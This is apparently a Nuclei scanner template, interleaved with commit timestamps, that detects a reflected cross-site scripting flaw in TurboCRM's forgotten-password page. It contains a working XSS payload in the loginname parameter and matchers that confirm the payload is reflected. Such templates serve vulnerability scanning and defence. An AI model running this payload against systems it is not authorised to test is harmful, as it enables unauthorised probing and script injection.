2021-04-11 00:22:56 +00:00
id : turbocrm-xss
info :
2022-09-23 17:53:08 +00:00
name : TurboCRM - Cross-Site Scripting
2021-04-11 00:22:56 +00:00
author : pikpikcu
2022-09-23 17:53:08 +00:00
severity : high
description : TurboCRM contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary JavaScript into the response returned by the application.
2022-04-22 10:38:41 +00:00
reference :
- https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
2022-09-23 17:53:08 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2021-04-11 00:22:56 +00:00
tags : xss,turbocrm
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-04-11 00:22:56 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-04-11 00:22:56 +00:00
- method : GET
path :
2021-04-11 11:54:54 +00:00
- '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
2021-04-11 00:22:56 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-04-11 11:54:54 +00:00
- '"><script>alert(document.domain)</script>'
2021-04-11 00:22:56 +00:00
part : body
2021-04-11 11:54:54 +00:00
- type : word
part : header
words :
- "text/html"
2021-04-11 00:22:56 +00:00
- type : status
status :
2022-09-23 17:53:08 +00:00
- 200